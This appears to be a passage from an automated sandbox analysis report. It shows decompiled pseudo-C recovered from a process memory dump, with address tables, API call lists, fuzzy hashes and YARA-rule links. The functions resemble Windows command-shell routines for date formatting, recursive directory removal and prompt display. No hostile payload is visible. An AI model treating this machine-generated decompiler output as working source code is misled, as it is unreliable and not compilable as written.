                                                    0x011d5c07
                                                    0x011d5c32
                                                    0x011d5d34
                                                    0x011d5d53
                                                    0x011d5d57
                                                    0x011e9b8d
                                                    0x011e9b95
                                                    0x011e9b9f
                                                    0x011e9b9f
                                                    0x011e9ba4
                                                    0x011e9bac
                                                    0x011e9bac
                                                    0x011e9bb3
                                                    0x011d5cca
                                                    0x011d5cda
                                                    0x011d5cda
                                                    0x011d5d5d
                                                    0x011d5d68
                                                    0x011d5d6f
                                                    0x011d5d72
                                                    0x011e9ba9
                                                    0x011e9baa
                                                    0x011e9baa
                                                    0x00000000
                                                    0x011e9baa
                                                    0x011d5d7a
                                                    0x011d5d8c
                                                    0x011d5d93
                                                    0x011d5da4
                                                    0x011e9b98
                                                    0x011e9b9e
                                                    0x00000000
                                                    0x011e9b9e
                                                    0x011d5daa
                                                    0x011d5daa
                                                    0x011d5c46
                                                    0x011d5c52
                                                    0x011d5c55
                                                    0x011d5c59
                                                    0x011d5c60
                                                    0x011e9c79
                                                    0x011e9c94
                                                    0x011e9c9a
                                                    0x011e9c9b
                                                    0x011e9c96
                                                    0x011e9c96
                                                    0x011e9c97
                                                    0x011e9c97
                                                    0x011e9ca1
                                                    0x011e9c7b
                                                    0x011e9c7b
                                                    0x011e9c81
                                                    0x011e9c87
                                                    0x011e9ca9
                                                    0x011d5cc8
                                                    0x011d5cc8
                                                    0x00000000
                                                    0x011d5cc8
                                                    0x011d5c6d
                                                    0x011e9cd4
                                                    0x011d5c80
                                                    0x011d5c80
                                                    0x011d5c85
                                                    0x011d5c88
                                                    0x011d5c8c
                                                    0x011e9cb1
                                                    0x011e9cc0
                                                    0x011e9cc8
                                                    0x011d5c92
                                                    0x011d5c96
                                                    0x011d5ca5
                                                    0x011d5caa
                                                    0x011d5caa
                                                    0x011d5cb0
                                                    0x011d5cb0
                                                    0x011d5cb5
                                                    0x011d5cb8
                                                    0x011d5cba
                                                    0x011d5cba
                                                    0x011d5cbd
                                                    0x011d5cbf
                                                    0x011d5cc6
                                                    0x00000000
                                                    0x011d5cc6
                                                    0x011d5c38
                                                    0x011d5c40
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d5bc5
                                                    0x011d5bc5
                                                    0x011d5bcd
                                                    0x011d5bd0
                                                    0x011d5bd1
                                                    0x011d5bd5
                                                    0x011e9b1d
                                                    0x011e9b24
                                                    0x00000000
                                                    0x011e9b24
                                                    0x011d5bdd
                                                    0x011d5bf2
                                                    0x011d5cdd
                                                    0x011d5cdf
                                                    0x011d5ce1
                                                    0x011d5ce1
                                                    0x011d5ce3
                                                    0x011d5ce4
                                                    0x011d5ceb
                                                    0x011d5cf3
                                                    0x011d5cf9
                                                    0x011e9b2d
                                                    0x011e9b31
                                                    0x011e9b35
                                                    0x011e9b35
                                                    0x011e9b3e
                                                    0x011e9b82
                                                    0x011e9b40
                                                    0x011e9b40
                                                    0x011e9b46
                                                    0x011e9b4b
                                                    0x011e9b51
                                                    0x011e9b51
                                                    0x011e9b54
                                                    0x011e9b56
                                                    0x011e9b65
                                                    0x011e9b74
                                                    0x011e9b7a
                                                    0x011e9b7a
                                                    0x00000000
                                                    0x011e9b3e
                                                    0x011d5cff
                                                    0x011d5d01
                                                    0x011d5d04
                                                    0x011d5d04
                                                    0x011d5d07
                                                    0x011d5d09
                                                    0x011d5d23
                                                    0x011d5d29
                                                    0x011d5d2c
                                                    0x011d5d2c
                                                    0x011d5bf4
                                                    0x011d5bf4
                                                    0x011d5bf9
                                                    0x011d5bfe
                                                    0x011d5bfe
                                                    0x011d5c01
                                                    0x00000000
                                                    0x011d5c01
                                                    0x011d5bc3

                                                    APIs
                                                    • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,011FF830,?,00002000), ref: 011D5B31
                                                    • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D5B45
                                                    • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 011D5B59
                                                    • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D5B6D
                                                    • realloc.MSVCRT ref: 011E9C24
                                                      • Part of subcall function 011E41A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(011D5BA1,0000001F,?,00000080), ref: 011E41A4
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 011D5BA2
                                                    • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 011D5C2A
                                                    • memmove.MSVCRT ref: 011D5D23
                                                    • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 011D5D4D
                                                    • realloc.MSVCRT ref: 011D5D68
                                                    • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 011D5D9C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                                    • String ID: %02d%s%02d%s%02d$%s $%s %s
                                                    • API String ID: 2927284792-4023967598
                                                    • Opcode ID: 276b72f15e50af914f3d69413f6bb0c92b52d2679d448c1580c1df7a60febb3b
                                                    • Instruction ID: 76cd7a06cad67bd7d68d8fe329aa2d965ab84651da7277fc0e31147f3469e279
                                                    • Opcode Fuzzy Hash: 276b72f15e50af914f3d69413f6bb0c92b52d2679d448c1580c1df7a60febb3b
                                                    • Instruction Fuzzy Hash: 14C1B471A006299BDF2CDB98DC4CAFE77F9EB99708F004169E90AD7244DB319E81CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D85EA, Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 378fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E011D85EA(WCHAR* __ecx, long __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				struct _WIN32_FIND_DATAW _v1140;
				WCHAR* _v1144;
				long _v1148;
				void* _v1152;
				char _v1156;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t104;
				short _t117;
				void* _t121;
				signed int _t122;
				signed int _t124;
				WCHAR* _t126;
				void* _t127;
				void* _t130;
				WCHAR* _t136;
				intOrPtr _t139;
				WCHAR* _t140;
				WCHAR* _t144;
				intOrPtr _t147;
				WCHAR* _t151;
				WCHAR* _t153;
				WCHAR* _t158;
				WCHAR* _t159;
				long _t160;
				long _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				WCHAR* _t168;
				WCHAR* _t169;
				void* _t173;
				void* _t177;
				long _t178;
				void* _t179;
				void* _t180;
				short* _t186;
				signed int _t188;
				long _t192;
				signed int _t193;
				signed int _t194;
				intOrPtr* _t197;
				signed int _t198;
				signed int _t199;
				intOrPtr* _t203;
				signed int _t205;
				WCHAR* _t207;
				char* _t208;
				char* _t209;
				long _t214;
				signed int _t220;
				WCHAR* _t221;
				signed int _t222;
				long _t223;
				signed int _t224;
				void* _t225;
				void* _t226;
				void* _t241;
				void* _t260;

				_t217 = __edx;
				_t104 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t104 ^ _t224;
				_v24 = 1;
				_t223 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t220 = __edx;
				_t176 = __ecx;
				_v1148 = __edx;
				_v1144 = __ecx;
				memset( &_v548, 0, 0x104);
				_t226 = _t225 + 0xc;
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t223 = 8;
					goto L43;
				} else {
					 *_t220 = 1;
					_t221 = _t176;
					_t186 =  &(_t221[1]);
					do {
						_t117 =  *_t221;
						_t221 =  &(_t221[1]);
					} while (_t117 != 0);
					_t222 = _t221 - _t186;
					_t220 = _t222 >> 1;
					if(_t222 == 0) {
						_t223 = 0xa1;
						L43:
						__imp__??_V@YAXPAX@Z();
						return E011E6FD0(_t223, _t176, _v8 ^ _t224, _t217, _t220, _t223, _v28);
					}
					if(_t220 + 3 > 0x7fe7) {
						L42:
						_t223 = E011D8885(_t176);
						goto L43;
					}
					_t121 = FindFirstFileW(_t176,  &_v1140);
					if(_t121 == 0xffffffff) {
						_t122 = 0x10;
						_t188 = 0;
						_v1140.dwFileAttributes = _t122;
						_v1140.dwReserved0 = 0;
					} else {
						FindClose(_t121);
						_t188 = _v1140.dwReserved0;
						_t122 = _v1140.dwFileAttributes;
					}
					if((_t122 & 0x00000010) == 0) {
						goto L42;
					} else {
						if((_t122 & 0x00000400) != 0) {
							__eflags = _t188 & 0x20000000;
							if((_t188 & 0x20000000) != 0) {
								goto L42;
							}
						}
						E011E0D89(_t217, _t176);
						_t124 =  *(_t176 + _t220 * 2 - 2) & 0x0000ffff;
						if(_t124 != 0x3a && _t124 != 0x5c) {
							E011E0CF2(_t217, "\\");
							_t220 = _t220 + 1;
						}
						E011E0CF2(_t217, "*");
						_t126 = _v28;
						if(_t126 == 0) {
							_t126 =  &_v548;
						}
						_t127 = FindFirstFileW(_t126,  &_v1140);
						_v1152 = _t127;
						if(_t127 == 0xffffffff) {
							goto L42;
						} else {
							while(1) {
								L14:
								_t241 =  *0x11fd544 - _t223; // 0x0
								if(_t241 != 0) {
									break;
								}
								_t217 =  &(_v1140.cAlternateFileName);
								_t192 = _t217;
								_t177 = _t192 + 2;
								do {
									_t130 =  *_t192;
									_t192 = _t192 + 2;
								} while (_t130 != _t223);
								_t193 = _t192 - _t177;
								_t194 = _t193 >> 1;
								if(_t193 != 0) {
									L21:
									if(_t194 + _t220 >= 0x7fe7) {
										_t176 = _v1144;
										_push(_t217);
										 *_v1148 = _t223;
										E011DC5A2(_t194, 0x400023da, 2, _v1144);
										L41:
										FindClose(_v1152);
										_t260 =  *0x11fd544 - _t223; // 0x0
										if(_t260 != 0) {
											goto L43;
										}
										goto L42;
									}
									_t134 = _v28;
									if(_v28 == 0) {
										_t134 =  &_v548;
									}
									E011E1040(_t134 + _t220 * 2, _v20 - _t220, _t217);
									_t178 = _v1140.dwFileAttributes;
									if((_t178 & 0x00000010) == 0) {
										__eflags = _t178 & 0x00000001;
										if((_t178 & 0x00000001) != 0) {
											_t207 = _v28;
											__eflags = _t207;
											if(_t207 == 0) {
												_t207 =  &_v548;
											}
											_t162 = _t178 & 0xfffffffe;
											__eflags = _t162;
											SetFileAttributesW(_t207, _t162);
										}
										_t196 = _v28;
										__eflags = _v28;
										if(_v28 == 0) {
											_t196 =  &_v548;
										}
										_t217 = _t178;
										_t136 = E011D83F2(_t196, _t178);
										__eflags = _t136;
										if(_t136 == 0) {
											goto L39;
										} else {
											__eflags = _t136 - 0x4d3;
											if(_t136 == 0x4d3) {
												break;
											}
											__eflags = _t136 - 3;
											if(_t136 == 3) {
												_t158 = _v28;
												__eflags = _t158;
												if(_t158 == 0) {
													_t158 =  &_v548;
												}
												__imp___wcsnicmp(_t158, L"\\\\?\\", 4);
												_t226 = _t226 + 0xc;
												__eflags = _t158;
												if(_t158 != 0) {
													_t159 = _v28;
													__eflags = _t159;
													if(_t159 == 0) {
														_t159 =  &_v548;
													}
													_t160 = GetFullPathNameW(_t159, _t223, _t223, _t223);
													__eflags = _t160 - 0x7fe7;
													if(_t160 > 0x7fe7) {
														SetLastError(0x6f);
													}
												}
											}
											_t197 =  &(_v1140.cAlternateFileName);
											_t217 = _t197 + 2;
											do {
												_t139 =  *_t197;
												_t197 = _t197 + 2;
												__eflags = _t139 - _t223;
											} while (_t139 != _t223);
											_t140 = _v28;
											_t198 = _t197 - _t217;
											__eflags = _t198;
											_t199 = _t198 >> 1;
											if(_t198 == 0) {
												L86:
												__eflags = _t140;
												if(_t140 == 0) {
													_t140 =  &_v548;
												}
												E011DC5A2(_t199, 0x4000271b, 1, _t140);
												_t226 = _t226 + 0xc;
												L89:
												_push(_t223);
												_push(GetLastError());
												E011DC5A2(_t199);
												_t144 = _v28;
												__eflags = _t144;
												if(_t144 == 0) {
													_t144 =  &_v548;
												}
												SetFileAttributesW(_t144, _t178);
												 *_v1148 = _t223;
												goto L39;
											}
											__eflags = _t140;
											if(_t140 == 0) {
												_t140 =  &_v548;
											}
											__eflags = 0;
											_t140[_t220] = 0;
											_t203 =  &(_v1140.cFileName);
											_t217 = _t203 + 2;
											do {
												_t147 =  *_t203;
												_t203 = _t203 + 2;
												__eflags = _t147 - _t223;
											} while (_t147 != _t223);
											_t205 = _t203 - _t217 >> 1;
											_t199 =  &_v548;
											__eflags = _t205 + _t220 - 0x7fe7;
											if(_t205 + _t220 < 0x7fe7) {
												E011E0CF2(_t217,  &(_v1140.cFileName));
												_t151 = _v28;
												__eflags = _t151;
												if(_t151 == 0) {
													_t151 =  &_v548;
												}
												E011DC5A2(_t199, 0x4000271b, 1, _t151);
												_t153 = _v28;
												_t226 = _t226 + 0xc;
												__eflags = _t153;
												if(_t153 == 0) {
													_t153 =  &_v548;
												}
												_t153[_t220] = 0;
												_t199 =  &_v548;
												E011E0CF2(_t217,  &(_v1140.cAlternateFileName));
												goto L89;
											}
											E011E0CF2(_t217,  &(_v1140.cAlternateFileName));
											_t140 = _v28;
											goto L86;
										}
									} else {
										_t208 = ".";
										_t164 =  &(_v1140.cFileName);
										_t179 = 4;
										while(1) {
											_t217 =  *_t164;
											if(_t217 !=  *_t208) {
												break;
											}
											if(_t217 == 0) {
												L29:
												_t165 = _t223;
												L30:
												if(_t165 == 0) {
													L39:
													if(FindNextFileW(_v1152,  &_v1140) != 0) {
														goto L14;
													}
													goto L40;
												}
												_t209 = L"..";
												_t166 =  &(_v1140.cFileName);
												while(1) {
													_t217 =  *_t166;
													if(_t217 !=  *_t209) {
														break;
													}
													if(_t217 == 0) {
														L36:
														_t167 = _t223;
														L38:
														if(_t167 != 0) {
															_t210 = _v28;
															__eflags = _v28;
															if(_v28 == 0) {
																_t210 =  &_v548;
															}
															_t217 =  &_v1156;
															_t168 = E011D85EA(_t210,  &_v1156);
															__eflags =  *0x11fd544 - _t223; // 0x0
															if(__eflags != 0) {
																goto L40;
															} else {
																__eflags = _t168;
																if(_t168 == 0) {
																	goto L39;
																}
																_t211 = _v1148;
																 *_v1148 = _t223;
																__eflags = _t168 - 0x91;
																if(_t168 != 0x91) {
																	L58:
																	_t169 = _v28;
																	__eflags = _t169;
																	if(_t169 == 0) {
																		_t169 =  &_v548;
																	}
																	E011DC5A2(_t211, 0x4000271b, 1, _t169);
																	_t226 = _t226 + 0xc;
																	_push(_t223);
																	_push(GetLastError());
																	E011DC5A2(_t211);
																	goto L39;
																}
																__eflags = _v1156 - _t223;
																if(_v1156 == _t223) {
																	goto L39;
																}
																goto L58;
															}
														}
														goto L39;
													}
													_t217 =  *((intOrPtr*)(_t166 + 2));
													_t47 =  &(_t209[2]); // 0x2e
													if(_t217 !=  *_t47) {
														break;
													}
													_t166 = _t166 + _t179;
													_t209 =  &(_t209[_t179]);
													if(_t217 != 0) {
														continue;
													}
													goto L36;
												}
												asm("sbb eax, eax");
												_t167 = _t166 | 0x00000001;
												__eflags = _t167;
												goto L38;
											}
											_t217 =  *((intOrPtr*)(_t164 + 2));
											_t44 =  &(_t208[2]); // 0x200000
											if(_t217 !=  *_t44) {
												break;
											}
											_t164 = _t164 + _t179;
											_t208 =  &(_t208[_t179]);
											if(_t217 != 0) {
												continue;
											}
											goto L29;
										}
										asm("sbb eax, eax");
										_t165 = _t164 | 0x00000001;
										goto L30;
									}
								}
								_t217 =  &(_v1140.cFileName);
								_t214 = _t217;
								_t180 = _t214 + 2;
								do {
									_t173 =  *_t214;
									_t214 = _t214 + 2;
								} while (_t173 != _t223);
								_t194 = _t214 - _t180 >> 1;
								goto L21;
							}
							L40:
							_t176 = _v1144;
							goto L41;
						}
					}
				}
			}





































































                                                    0x011d85ea
                                                    0x011d85f5
                                                    0x011d85fc
                                                    0x011d8607
                                                    0x011d860c
                                                    0x011d860e
                                                    0x011d8617
                                                    0x011d861a
                                                    0x011d861c
                                                    0x011d8620
                                                    0x011d8626
                                                    0x011d862c
                                                    0x011d8639
                                                    0x011d8655
                                                    0x011d8882
                                                    0x00000000
                                                    0x011d865b
                                                    0x011d865b
                                                    0x011d8661
                                                    0x011d8663
                                                    0x011d8666
                                                    0x011d8666
                                                    0x011d8669
                                                    0x011d866c
                                                    0x011d8671
                                                    0x011d8673
                                                    0x011d8675
                                                    0x011f03bb
                                                    0x011d8859
                                                    0x011d885c
                                                    0x011d8875
                                                    0x011d8875
                                                    0x011d8683
                                                    0x011d8850
                                                    0x011d8857
                                                    0x00000000
                                                    0x011d8857
                                                    0x011d8691
                                                    0x011d869a
                                                    0x011f03c7
                                                    0x011f03c8
                                                    0x011f03ca
                                                    0x011f03d0
                                                    0x011d86a0
                                                    0x011d86a1
                                                    0x011d86a7
                                                    0x011d86ad
                                                    0x011d86ad
                                                    0x011d86b5
                                                    0x00000000
                                                    0x011d86bb
                                                    0x011d86c0
                                                    0x011f03db
                                                    0x011f03e1
                                                    0x00000000
                                                    0x00000000
                                                    0x011f03e7
                                                    0x011d86cd
                                                    0x011d86d2
                                                    0x011d86da
                                                    0x011d86ec
                                                    0x011d86f1
                                                    0x011d86f1
                                                    0x011d86fd
                                                    0x011d8702
                                                    0x011d8707
                                                    0x011f03ec
                                                    0x011f03ec
                                                    0x011d8715
                                                    0x011d871b
                                                    0x011d8724
                                                    0x00000000
                                                    0x011d872a
                                                    0x011d872a
                                                    0x011d872a
                                                    0x011d872a
                                                    0x011d8730
                                                    0x00000000
                                                    0x00000000
                                                    0x011d8736
                                                    0x011d873c
                                                    0x011d873e
                                                    0x011d8741
                                                    0x011d8741
                                                    0x011d8744
                                                    0x011d8747
                                                    0x011d874c
                                                    0x011d874e
                                                    0x011d8750
                                                    0x011d876c
                                                    0x011d8774
                                                    0x011f0615
                                                    0x011f061b
                                                    0x011f0624
                                                    0x011f0626
                                                    0x011d883b
                                                    0x011d8842
                                                    0x011d8848
                                                    0x011d884e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d884e
                                                    0x011d877a
                                                    0x011d877f
                                                    0x011f03f7
                                                    0x011f03f7
                                                    0x011d878e
                                                    0x011d8793
                                                    0x011d879c
                                                    0x011f047a
                                                    0x011f047d
                                                    0x011f047f
                                                    0x011f0482
                                                    0x011f0484
                                                    0x011f0486
                                                    0x011f0486
                                                    0x011f048e
                                                    0x011f048e
                                                    0x011f0493
                                                    0x011f0493
                                                    0x011f0499
                                                    0x011f049c
                                                    0x011f049e
                                                    0x011f04a0
                                                    0x011f04a0
                                                    0x011f04a6
                                                    0x011f04a8
                                                    0x011f04ad
                                                    0x011f04af
                                                    0x00000000
                                                    0x011f04b5
                                                    0x011f04b5
                                                    0x011f04ba
                                                    0x00000000
                                                    0x00000000
                                                    0x011f04c0
                                                    0x011f04c3
                                                    0x011f04c5
                                                    0x011f04c8
                                                    0x011f04ca
                                                    0x011f04cc
                                                    0x011f04cc
                                                    0x011f04da
                                                    0x011f04e0
                                                    0x011f04e3
                                                    0x011f04e5
                                                    0x011f04e7
                                                    0x011f04ea
                                                    0x011f04ec
                                                    0x011f04ee
                                                    0x011f04ee
                                                    0x011f04f8
                                                    0x011f04fe
                                                    0x011f0503
                                                    0x011f0507
                                                    0x011f0507
                                                    0x011f0503
                                                    0x011f04e5
                                                    0x011f050d
                                                    0x011f0513
                                                    0x011f0516
                                                    0x011f0516
                                                    0x011f0519
                                                    0x011f051c
                                                    0x011f051c
                                                    0x011f0521
                                                    0x011f0524
                                                    0x011f0524
                                                    0x011f0526
                                                    0x011f0528
                                                    0x011f0571
                                                    0x011f0571
                                                    0x011f0573
                                                    0x011f0575
                                                    0x011f0575
                                                    0x011f0583
                                                    0x011f0588
                                                    0x011f058b
                                                    0x011f058b
                                                    0x011f0592
                                                    0x011f0593
                                                    0x011f0598
                                                    0x011f059d
                                                    0x011f059f
                                                    0x011f05a1
                                                    0x011f05a1
                                                    0x011f05a9
                                                    0x011f05b5
                                                    0x00000000
                                                    0x011f05b5
                                                    0x011f052a
                                                    0x011f052c
                                                    0x011f052e
                                                    0x011f052e
                                                    0x011f0534
                                                    0x011f0536
                                                    0x011f053a
                                                    0x011f0540
                                                    0x011f0543
                                                    0x011f0543
                                                    0x011f0546
                                                    0x011f0549
                                                    0x011f0549
                                                    0x011f0550
                                                    0x011f0555
                                                    0x011f055b
                                                    0x011f0560
                                                    0x011f05c3
                                                    0x011f05c8
                                                    0x011f05cb
                                                    0x011f05cd
                                                    0x011f05cf
                                                    0x011f05cf
                                                    0x011f05dd
                                                    0x011f05e2
                                                    0x011f05e5
                                                    0x011f05e8
                                                    0x011f05ea
                                                    0x011f05ec
                                                    0x011f05ec
                                                    0x011f05f4
                                                    0x011f05ff
                                                    0x011f0605
                                                    0x00000000
                                                    0x011f0605
                                                    0x011f0569
                                                    0x011f056e
                                                    0x00000000
                                                    0x011f056e
                                                    0x011d87a2
                                                    0x011d87a4
                                                    0x011d87a9
                                                    0x011d87af
                                                    0x011d87b0
                                                    0x011d87b0
                                                    0x011d87b6
                                                    0x00000000
                                                    0x00000000
                                                    0x011d87bf
                                                    0x011d87d8
                                                    0x011d87d8
                                                    0x011d87da
                                                    0x011d87dc
                                                    0x011d881a
                                                    0x011d882f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d882f
                                                    0x011d87de
                                                    0x011d87e3
                                                    0x011d87e9
                                                    0x011d87e9
                                                    0x011d87ef
                                                    0x00000000
                                                    0x00000000
                                                    0x011d87f4
                                                    0x011d8809
                                                    0x011d8809
                                                    0x011d8812
                                                    0x011d8814
                                                    0x011f0402
                                                    0x011f0405
                                                    0x011f0407
                                                    0x011f0409
                                                    0x011f0409
                                                    0x011f040f
                                                    0x011f0415
                                                    0x011f041a
                                                    0x011f0420
                                                    0x00000000
                                                    0x011f0426
                                                    0x011f0426
                                                    0x011f0428
                                                    0x00000000
                                                    0x00000000
                                                    0x011f042e
                                                    0x011f0434
                                                    0x011f0436
                                                    0x011f043b
                                                    0x011f0449
                                                    0x011f0449
                                                    0x011f044c
                                                    0x011f044e
                                                    0x011f0450
                                                    0x011f0450
                                                    0x011f045e
                                                    0x011f0463
                                                    0x011f0466
                                                    0x011f046d
                                                    0x011f046e
                                                    0x00000000
                                                    0x011f0474
                                                    0x011f043d
                                                    0x011f0443
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0443
                                                    0x011f0420
                                                    0x00000000
                                                    0x011d8814
                                                    0x011d87f6
                                                    0x011d87fa
                                                    0x011d87fe
                                                    0x00000000
                                                    0x00000000
                                                    0x011d8800
                                                    0x011d8802
                                                    0x011d8807
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d8807
                                                    0x011d880d
                                                    0x011d880f
                                                    0x011d880f
                                                    0x00000000
                                                    0x011d880f
                                                    0x011d87c1
                                                    0x011d87c5
                                                    0x011d87c9
                                                    0x00000000
                                                    0x00000000
                                                    0x011d87cf
                                                    0x011d87d1
                                                    0x011d87d6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d87d6
                                                    0x011d8876
                                                    0x011d8878
                                                    0x00000000
                                                    0x011d8878
                                                    0x011d879c
                                                    0x011d8752
                                                    0x011d8758
                                                    0x011d875a
                                                    0x011d875d
                                                    0x011d875d
                                                    0x011d8760
                                                    0x011d8763
                                                    0x011d876a
                                                    0x00000000
                                                    0x011d876a
                                                    0x011d8835
                                                    0x011d8835
                                                    0x00000000
                                                    0x011d8835
                                                    0x011d8724
                                                    0x011d86b5

                                                    APIs
                                                    • memset.MSVCRT ref: 011D862C
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000105), ref: 011D8691
                                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105), ref: 011D86A1
                                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,011D250C,?,?,?,-00000105), ref: 011D8715
                                                    • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000105), ref: 011D8827
                                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 011D8842
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D885C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstmemset$Next
                                                    • String ID: \\?\
                                                    • API String ID: 3059144641-4282027825
                                                    • Opcode ID: 83ca8c62d9b19c3c7d69e25fb9a1da284cf8f5e6a70b6f06c85468c62b2b9588
                                                    • Instruction ID: 0e3f421af7f84e1e86e2c1c3aec1e6f4d4825a6dbf7035d2294294d4b06031d6
                                                    • Opcode Fuzzy Hash: 83ca8c62d9b19c3c7d69e25fb9a1da284cf8f5e6a70b6f06c85468c62b2b9588
                                                    • Instruction Fuzzy Hash: D4D1D571A0011A9BDF2DDB68EC99BBE7779EF18304F4404ADE609D3142EB709A85CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F6FF0, Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 464COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 73%
                                                    			E011F6FF0(void* __ecx) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v36;
				signed int _v48;
				void _v50;
				void _v52;
				void _v54;
				short _v56;
				char _v124;
				char _v644;
				void* _v648;
				void* _v652;
				signed int _v656;
				signed short* _v660;
				signed short* _v664;
				WCHAR* _v668;
				signed int _v672;
				void* _v676;
				char _v680;
				char _v684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t111;
				signed int _t112;
				intOrPtr _t119;
				void _t121;
				signed short _t122;
				signed int _t125;
				signed int _t126;
				void _t131;
				void _t136;
				intOrPtr* _t138;
				void _t142;
				signed int _t153;
				signed short* _t163;
				intOrPtr* _t164;
				void* _t167;
				signed short* _t173;
				signed int _t174;
				void* _t184;
				signed int _t187;
				void* _t188;
				signed int _t189;
				signed int _t190;
				void* _t191;
				signed int _t193;
				void* _t196;
				void* _t199;
				signed short* _t200;
				void* _t201;
				intOrPtr* _t202;
				signed int _t204;
				void* _t207;
				void* _t209;
				void* _t210;
				void* _t211;
				signed short* _t213;
				void* _t214;
				signed int _t219;
				signed int _t221;
				intOrPtr _t222;
				signed int _t226;
				intOrPtr _t227;
				intOrPtr _t228;

				_t153 = _t219;
				_push(__ecx);
				_push(__ecx);
				_t221 = (_t219 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t153 + 4));
				_t217 = _t221;
				_push(0xfffffffe);
				_push(0x11fc140);
				_push(E011E7290);
				_push( *[fs:0x0]);
				_push(__ecx);
				_push(__ecx);
				_push(_t153);
				_t222 = _t221 - 0x288;
				_t111 =  *0x11fd0b4; // 0x1805bc26
				_v20 = _v20 ^ _t111;
				_t112 = _t111 ^ _t221;
				_v48 = _t112;
				_push(_t112);
				_t113 =  &_v28;
				 *[fs:0x0] =  &_v28;
				_v36 = _t222;
				_v672 = 0;
				_t226 =  *0x11fd544; // 0x0
				if(_t226 != 0) {
					_push(0);
					_push(0x2335);
					_t113 = E011DC108(__ecx);
					EnterCriticalSection( *0x1203858);
					 *0x11fd544 = 0;
					LeaveCriticalSection( *0x1203858);
				}
				_t227 =  *0x11fd0c8; // 0x1
				if(_t227 == 0) {
					L96:
					 *[fs:0x0] = _v28;
					_pop(_t199);
					_pop(_t207);
					return E011E6FD0(_t113, _t153, _v48 ^ _t217, _t182, _t199, _t207);
				} else {
					_t228 =  *0x11fd5c8; // 0x0
					if(_t228 == 0) {
						E011E25D9(L"\r\n");
					}
					if( *0x1207896 == 0) {
						_t200 = E011DCFBC(L"PROMPT");
						_v660 = _t200;
						if(_t200 != 0) {
							_v660 = 0x1218110;
							E011E1040(0x1218110, 0x200, _t200);
							 *0x1207896 = 1;
						}
					} else {
						_v660 = 0x1218110;
					}
					_t160 =  *0x1213cb8;
					if( *0x1213cb8 == 0) {
						_t160 = 0x1213ab0;
					}
					_t182 =  *0x1213cc0;
					E011E36CB(_t153, _t160,  *0x1213cc0, 0);
					_t113 = E011F6FA6( &_v680);
					_v676 = _t113;
					if(_t113 == 0) {
						goto L96;
					} else {
						_t201 = _t113;
						_v652 = _t201;
						 *_t113 = 0;
						_t209 = _v680 - 1;
						_v648 = _t209;
						_t163 = _v660;
						if(_t163 == 0) {
							L86:
							_t117 =  *0x1213cb8;
							if( *0x1213cb8 == 0) {
								_t117 = 0x1213ab0;
							}
							_t202 = _v676;
							E011E274C(_t202, _t209, L"%s>", _t117);
							_t164 = _t202;
							_t103 = _t164 + 2; // 0x2
							_t210 = _t103;
							do {
								_t119 =  *_t164;
